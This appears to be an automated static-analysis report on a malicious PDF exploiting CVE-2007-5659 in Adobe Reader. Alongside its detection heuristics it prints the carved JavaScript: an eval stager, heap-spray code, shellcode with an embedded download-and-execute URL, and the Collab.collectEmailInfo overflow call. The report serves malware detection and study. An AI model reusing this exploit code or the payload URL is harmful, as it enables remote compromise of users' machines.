Malicious PDF — malware analysis report

Static analysis result for SHA-256 7260125f11ec6a5e…

MALICIOUS

PDF

16.0 KB
MD5: e74c2f51db3d893dbb9fdb06990a863f SHA-1: 2156a097bf03b83ead15ef0314aae581c6436dfb SHA-256: 7260125f11ec6a5e9964b074ace0c2bb92a34593c23068a0b12e69b660f6a5b5
406 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed as a multi-stage dropper, first decoding a payload from the annotation subject and then using String.fromCharCode with hex decoding to construct and execute further code. It contains an embedded URL, http://gogopplgo.com/info/sun.html/n002106204r0409Xd601926cY4c64b1f0, which is likely used to download a second-stage payload. The presence of anti-analysis checks and version gating further indicates malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 11

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Annotation subject callee-key hex JavaScript stager high PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGER
    PDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://gogopplgo.com/info/sun.html/n002106204r0409Xd601926cY4c64b1f0 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 9 at offset 0x3DA7 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
annotation_subject_callee_hex_stage_000.js
2dd621dafe544cacbc3cb02835402a73319dcc3f8eb9cd5eed70a5b6f66b2fbc		 deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x1882 4881 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var R_YJ5uVU__D = new Array();var qtelJbpyH__y = 0;var S_snaDN5_uR_3 = "";function Mt3_Gfo_0_d5N(U__i_5_k0, WS0_h2BLD1u57){var IXCNqv = WS0_h2BLD1u57.toString();var CTF2e6a = "";for(var hdvF_NA = 0; hdvF_NA < IXCNqv.length; hdvF_NA++) {var TpCKpxDx = parseInt(IXCNqv.substr(hdvF_NA, 1));if (!isNaN(TpCKpxDx)) {TpCKpxDx = TpCKpxDx.toString(16);if (TpCKpxDx.length == 1) { TpCKpxDx = "0" + TpCKpxDx; }else if (TpCKpxDx.length != 2) { TpCKpxDx = "00"; }CTF2e6a = TpCKpxDx + CTF2e6a;if (CTF2e6a.length == 8) {break;}}}while(CTF2e6a.length < 8) { CTF2e6a = "0" + CTF2e6a; }var Ohw7g_m_iS = U__i_5_k0.toString(16);if (Ohw7g_m_iS.length == 1) { Ohw7g_m_iS = "0" + Ohw7g_m_iS; }else if (Ohw7g_m_iS.length != 2) { Ohw7g_m_iS = "00"; }CTF2e6a = "3" + Ohw7g_m_iS + "P" + CTF2e6a;return CTF2e6a;}function T_iG_pk3k0Cas(N___mN_kB34, t5__4iSXA_hA){var Wo__sLIs = new Array("");var f4_rx_kUH = N___mN_kB34;var Lcba_R6sO;if ((Lcba_R6sO = N___mN_kB34.lastIndexOf("%u00")) != -1) {if (Lcba_R6sO + 6 == N___mN_kB34.length) {Wo__sLIs[0] = N___mN_kB34.substr(Lcba_R6sO + 4, 2);f4_rx_kUH = N___mN_kB34.substring(0, Lcba_R6sO);}}Lcba_R6sO = 1;for (hdvF_NA = 0; hdvF_NA < t5__4iSXA_hA.length; hdvF_NA++) {var wG1_I5_KT_6M1 = t5__4iSXA_hA.charCodeAt(hdvF_NA).toString(16);if (wG1_I5_KT_6M1.length == 1) { wG1_I5_KT_6M1 = "0" + wG1_I5_KT_6M1; }Wo__sLIs[Lcba_R6sO] = wG1_I5_KT_6M1;Lcba_R6sO++;}hdvF_NA = Wo__sLIs[0].length ? 0 : 1;Wo__sLIs[Lcba_R6sO] = "00";Wo__sLIs[Lcba_R6sO + 1] = "00";Lcba_R6sO += 2;if ((Wo__sLIs.length - hdvF_NA) % 2) {Wo__sLIs[Lcba_R6sO] = "00";}while(hdvF_NA < Wo__sLIs.length) {f4_rx_kUH += "%u" + Wo__sLIs[hdvF_NA + 1] + Wo__sLIs[hdvF_NA];hdvF_NA += 2;}f4_rx_kUH += "%u0000";return f4_rx_kUH;}function N_H7J_4_c(i3Aq_D, t_J_47b){while (i3Aq_D.length*2<t_J_47b) {i3Aq_D += i3Aq_D;}i3Aq_D = i3Aq_D.substring(0,t_J_47b/2);return i3Aq_D;}function x5_Wa0p23PV(FrM_MEi, bQHLdpWNM, TF7_cG_V){var X_88KKG = 0x0c0c0c0c;var i3Aq_D = unescape(bQHLdpWNM);var t5__4iSXA_hA = Mt3_Gfo_0_d5N(FrM_MEi, TF7_cG_V);var b__58___x7E = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var N___mN_kB34 = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4770%u4371%u0063%u7468%u7074%u2f3a%u672f%u676f%u706f%u6c70%u6f67%u632e%u6d6f%u692f%u666e%u2f6f%u7573%u2e6e%u7468%u6c6d%u6e2f%u3030%u3132%u3630%u3032%u7234%u3430%u3930%u6458%u3036%u3931%u3632%u5963%u6334%u3436%u3162%u3066";app.kGMR1SV__d = unescape(T_iG_pk3k0Cas(N___mN_kB34, t5__4iSXA_hA));var DB_83y27h_H__Kw = 0x400000;var u_YkG88t = b__58___x7E.length * 2;var t_J_47b = DB_83y27h_H__Kw - (u_YkG88t+0x38);i3Aq_D = N_H7J_4_c(i3Aq_D, t_J_47b);var i20_Wn0 = (X_88KKG - 0x400000)/DB_83y27h_H__Kw;for (var D_gr_h = 0; D_gr_h < i20_Wn0; D_gr_h++) {R_YJ5uVU__D[D_gr_h] = i3Aq_D + b__58___x7E;}}function V__u_1mn(){var S87__qMS3 = "";for (hdvF_NA = 0; hdvF_NA < 12; hdvF_NA++) {S87__qMS3 += unescape("%u0c0c%u0c0c");}var U3j4_rp10c_A = "";for (hdvF_NA = 0; hdvF_NA < 750; hdvF_NA++) {U3j4_rp10c_A += S87__qMS3;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: U3j4_rp10c_A});app.clearTimeOut(qtelJbpyH__y);}function h501V_f(h5m_Su_256_5_G){var jpN_145 = 
... (truncated)
legacy_pdfkit_stage_000.js
bfb1f0af0dbcfbcfd308ca290b8c85c6428cef4d82fb592c4e008fac7240421d		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x18D6 11055 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function H_loeu(Giu5D_HR3E, JC080B_0U1){var d_g_KP_k = 512;var kLR6PR7_G0axg = 2;var KKJC0__kC4 = 0;var U4Mft12i_3g = 0;var a___TC = "";var w_Y_v_kv57 = "";var f2x8_6 = 0;var g6LIO7EE6 = 6 + 1;try {var h_y_1_4_r7_Y_c = 0;if (app) {U4Mft12i_3g = U4Mft12i_3g + 2;JC080B_0U1 = pr[h_y_1_4_r7_Y_c].subject;}} catch(e) { }U4Mft12i_3g = U4Mft12i_3g + 7;var g0_q07Awu4Q = new Array();if (!Giu5D_HR3E) { g0_q07Awu4Q = new Array(89,71,253,127,46,122);} else {g0_q07Awu4Q = Giu5D_HR3E;}var R2QMo0Ys = 0;var IDg_r2_QodQ = 0;var C2bU3fwJ5_6J = 0;g6LIO7EE6--;if (g6LIO7EE6 == 0) {} else {for(IDg_r2_QodQ = 0; IDg_r2_QodQ < JC080B_0U1.length; IDg_r2_QodQ += kLR6PR7_G0axg) {if (R2QMo0Ys >= g6LIO7EE6) {R2QMo0Ys = 0;}var OaO8G__7__4_the = JC080B_0U1.substr(IDg_r2_QodQ, kLR6PR7_G0axg) + 'XXZ';var tm__M3n = parseInt(OaO8G__7__4_the, 19 + kLR6PR7_G0axg);tm__M3n -= g0_q07Awu4Q[R2QMo0Ys] * (C2bU3fwJ5_6J + kLR6PR7_G0axg);R2QMo0Ys++;if (tm__M3n < 0) {tm__M3n = String.fromCharCode(tm__M3n - (256*(Math.floor(tm__M3n/256))));} else {tm__M3n = String.fromCharCode(tm__M3n);}if (U4Mft12i_3g == 9) {a___TC += tm__M3n;} else if (U4Mft12i_3g == 8) {a___TC += UUW_C_7323_0f;} else {if (U4Mft12i_3g != 9) {a___TC += IDg_r2_QodQ;}}C2bU3fwJ5_6J++;}}var dEU2O1 = this;dEU2O1['ev'+'al'](a___TC);}
	H_loeu(0, "1j2c4i784i8d1c9c12b360692j6a0k6h5g244e2e2b6b6j485jac1g6d6f01736a0c5kb211782ja08hc0bg71a8a39d937464417c941080751d898g2c5aa09a5c7b3i3103423f5d0gb5aa086480590935ae5g782e9i464043556k9g47bk36675c6a2g9d295h905c49602336710i7217ae55ai007392ag2g05ad7e37075g05bh7d0ga03106a10c6j7i121e6jaa5h911e1d4i06bf8h1b211f3dac67455h2h48623908431f4h2b2417669j3da0282a4g7g3h2f0c0891898gb23f1jac2k979i2i07ad398b2bbaa9970h801i0621b70hb58288b4aaa50c429f1537752c1da80a448616699501554k414b6b952d1i222c84bb6kbj5da34ja47h245j6928954k0287215aai7iaaa66d2d9k8b75b4650aakbi6a03212i72004i177k128db60aaa2i9i6cbk1e2ea38k5j2j092c939j5k2iag3240ae9a31992jaa60974g7754808k8j4k604c35466j801g7e1c7d5i97b5ae9d507ia003b9532248827ca1134436887j1979216h0k592i272g6019583f10aa3h01061c629d6abh115d35ah5e4gag719e961c1d82405c7c164k996d3ba0545382769c9g408063a75a7k3g570iac545624a22kai1a393aab0g189857bg858jb5231aba165h2c101i111f862i9abb02b12a2k1kagbjc0524jbgbdb441007854a7a144117033bj1g48bj689f75b3627h868879025i7gbh105jac8048a8045fbf734a1e8f7403aib70h262k948h9d4hc360b105ba2h975ebj259d61493e7c0f6k599g2h7k3239868228a04k4a5f21a07a27bbb28hah8b4eaeb25gb85g54828k187b5a5668bcb48861905f1i5j5f97ag613f0b7281bg2745bd7e77c11k1j5j336c070h6939366g1i914e07545j35aa8b833k3c105j6b1d3465133b98bi303f5a49bi771a4g3f37073k0b6179a4be9f8a2c588a3a459i4ja17i3c33a944a77a159d5j108c39264e512i005g493974400b386h99374a1g1h98772a352g8e6i24513d1aa7abbf3g2e3g5j00753d26666k9dc209ah4225ae02a80c7d450d75071f831i30bka19k649d287k929eba8h535c7h0a918b3f1162949i3h4g8655b113636j7178001e3g96bg4185bj0i807e347k25bbag49528f4d8d1f2g4kb96897b1952c8j46740k6c0bb57f654e2c28a09244209k0b9f831g6i6k9g9b80aj7435887ib4ab83b197880b7972456i521j52a524688616519ia68062055015667d45382f14226h613e14b98c20785kbi064e51766fa51fb6083b5i885ab0bd636a5c77741c62902g4a069j49a9238baeb54kbkb57a3i9a5g05bh7d0jab4b1494b17ka937077k0i2h6014225k1f1h7g2j20501i6h560542273e5f6f235i1437bf330779b46faf3632809e804i3hbe5h4j8jba08b272385j6e03af8521782b251fbjbf880b0512090hb97c03c2aa8ha23a7bak0d6c13179e023i7130a0799j223h4e5d8ec2624i2ba989b16h2f63a657a27k0h4k5328954kae85134bb5829g9i7i1c857b90b8563gb0bf3faa15229hbg40aaa20769a5c2b92d9970b2be2eb2bc9g3dbe3k8c9d5c1g6k3d4k9i8650795a197d5j35447aa0868e755f815c7e4h4k0e5dc16d768518916j6b626ba3c3643h6ga4a5bg011j75a559b45g0h46027a2c1ebf630k621b0c0a40ai1e0g69aj23311h5j38bg412391449ebj2c4ba74i919a3k418d88316i4d6f7d98188g20485da69c66397b218d1j4103ad2i01142g4092a110772j2ca5a0212734029374021414200j514d7f20061i5h3g1i1e1i2j4c4j0i0i19272k4e8d001k3b057b2e8ba96eba8h10b30g77987h5j799d5i7gbh105j0i783807b15ebd8b3718615k93822g2f4d67c1bh9d1ia8228c9g7j5i4j5897b2944b1h38951b7a4eb1076j182g4g5cak6d1a119i2cah973i079gaibd913jbk8d6086a469bibi3db87c6fa70bah9g878h7e135e9e739c2k140b906a89452h9d7068b12b2k6e3k57bd10623b5663bb0165911k4g3ea0868b28642869621fbj5b4j63a3040k4c61458k75ai5k673909450c215aa4b1879f1g5g9g1g80ad4a9
... (truncated)
deobfuscated.js
d1f4867d9699189fb2addadef359142ad78cd25c43cd2c17c4bc97c8c57bab19		 deobfuscated-js PDF JavaScript deobfuscation pass 94361 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 eval/decoder/string-building token(s). Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
1j2c4i784i8d1c9c12b360692j6a0k6h5g244e2e2b6b6j485jac1g6d6f01736a0c5kb211782ja08hc0bg71a8a39d937464417c941080751d898g2c5aa09a5c7b3i3103423f5d0gb5aa086480590935ae5g782e9i464043556k9g47bk36675c6a2g9d295h905c49602336710i7217ae55ai007392ag2g05ad7e37075g05bh7d0ga03106a10c6j7i121e6jaa5h911e1d4i06bf8h1b211f3dac67455h2h48623908431f4h2b2417669j3da0282a4g7g3h2f0c0891898gb23f1jac2k979i2i07ad398b2bbaa9970h801i0621b70hb58288b4aaa50c429f1537752c1da80a448616699501554k414b6b952d1i222c84bb6kbj5da34ja47h245j6928954k0287215aai7iaaa66d2d9k8b75b4650aakbi6a03212i72004i177k128db60aaa2i9i6cbk1e2ea38k5j2j092c939j5k2iag3240ae9a31992jaa60974g7754808k8j4k604c35466j801g7e1c7d5i97b5ae9d507ia003b9532248827ca1134436887j1979216h0k592i272g6019583f10aa3h01061c629d6abh115d35ah5e4gag719e961c1d82405c7c164k996d3ba0545382769c9g408063a75a7k3g570iac545624a22kai1a393aab0g189857bg858jb5231aba165h2c101i111f862i9abb02b12a2k1kagbjc0524jbgbdb441007854a7a144117033bj1g48bj689f75b3627h868879025i7gbh105jac8048a8045fbf734a1e8f7403aib70h262k948h9d4hc360b105ba2h975ebj259d61493e7c0f6k599g2h7k3239868228a04k4a5f21a07a27bbb28hah8b4eaeb25gb85g54828k187b5a5668bcb48861905f1i5j5f97ag613f0b7281bg2745bd7e77c11k1j5j336c070h6939366g1i914e07545j35aa8b833k3c105j6b1d3465133b98bi303f5a49bi771a4g3f37073k0b6179a4be9f8a2c588a3a459i4ja17i3c33a944a77a159d5j108c39264e512i005g493974400b386h99374a1g1h98772a352g8e6i24513d1aa7abbf3g2e3g5j00753d26666k9dc209ah4225ae02a80c7d450d75071f831i30bka19k649d287k929eba8h535c7h0a918b3f1162949i3h4g8655b113636j7178001e3g96bg4185bj0i807e347k25bbag49528f4d8d1f2g4kb96897b1952c8j46740k6c0bb57f654e2c28a09244209k0b9f831g6i6k9g9b80aj7435887ib4ab83b197880b7972456i521j52a524688616519ia68062055015667d45382f14226h613e14b98c20785kbi064e51766fa51fb6083b5i885ab0bd636a5c77741c62902g4a069j49a9238baeb54kbkb57a3i9a5g05bh7d0jab4b1494b17ka937077k0i2h6014225k1f1h7g2j20501i6h560542273e5f6f235i1437bf330779b46faf3632809e804i3hbe5h4j8jba08b272385j6e03af8521782b251fbjbf880b0512090hb97c03c2aa8ha23a7bak0d6c13179e023i7130a0799j223h4e5d8ec2624i2ba989b16h2f63a657a27k0h4k5328954kae85134bb5829g9i7i1c857b90b8563gb0bf3faa15229hbg40aaa20769a5c2b92d9970b2be2eb2bc9g3dbe3k8c9d5c1g6k3d4k9i8650795a197d5j35447aa0868e755f815c7e4h4k0e5dc16d768518916j6b626ba3c3643h6ga4a5bg011j75a559b45g0h46027a2c1ebf630k621b0c0a40ai1e0g69aj23311h5j38bg412391449ebj2c4ba74i919a3k418d88316i4d6f7d98188g20485da69c66397b218d1j4103ad2i01142g4092a110772j2ca5a0212734029374021414200j514d7f20061i5h3g1i1e1i2j4c4j0i0i19272k4e8d001k3b057b2e8ba96eba8h10b30g77987h5j799d5i7gbh105j0i783807b15ebd8b3718615k93822g2f4d67c1bh9d1ia8228c9g7j5i4j5897b2944b1h38951b7a4eb1076j182g4g5cak6d1a119i2cah973i079gaibd913jbk8d6086a469bibi3db87c6fa70bah9g878h7e135e9e739c2k140b906a89452h9d7068b12b2k6e3k57bd10623b5663bb0165911k4g3ea0868b28642869621fbj5b4j63a3040k4c61458k75ai5k673909450c215aa4b1879f1g5g9g1g80ad4a9i8i23429c36a18447b5861kbg5c5443690d8i2842035a2k162j78c2592029107b755d2i29b17b3j3ibe0j6k87ak0g0c1757974f0004486f0c2k2110465g0f7kajbj440k0h770ea55bak343bbe0ga1ak3cbh8a12a7ai617ga8988d59732ja4ajbk5j678455919j2i653e8fb329369i3b5da43c18a0ai5hb13cb9a07b41ac1b8fa0bg1f832c6j36bf3bac7174066j2aaj6454330kac7i57325gaa0ba4880f70410695ak09822f895e07ai62a8b19cc3988f54665dba4277bd9a4jb12j869j877b2h4db9537e714424260j5i633699bk742h6c2e85065f4j686d9k390k455j807b6a8j2950725a4f691h6d863i6e0a9j2g8hb7688616569709aa72b455bi9h7dbb8f18a8690b7e751ic04cb06f8j4h416e26aj821a3k4k3h9h7a2g3h0d5261723e611d54285jbi60b24e7h37285f9870303k00768b7i0504b0ae5k7j9dbjbhag1eb66e171f002h80b00bb1b21ec18591161cc01669aka1027j2k178e02135k336i5h134d412d647ka9221k3aa97c974d3c63814b087ab25g62589c4k9i551d29939g9g806j4db7a090b76136afb43f93ah2k9fag4da8751573ac07bg5k0ba32b2231a3c16g1007387g90a03fb05353ai8g528k2a2170804j6d469g605d5b484k3e846c742578154043860f8c7k5h7e8fb19i271f618i85bg0i2f66ac5i1k9i326j8k681e2h064gbk3ibjb3aa342i113k690d2j2hbb502i0e4k4a9167ac9a594b913j6k7157648j8j4e964h6f4693bj752h7d609e7e6d0i6d4cb4563d43761gc3a965269jah108h3abg9c7b14561k26b0933i040k201352375e132d1058472k1kb4c03351a80d172d1k6i5da51k4h135745b20c3e8i9800a51a4f7g796a6811867c05448d0b8h2k9d978f9h7521b7557i9b84070413709593ah1595638da3b44e53
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.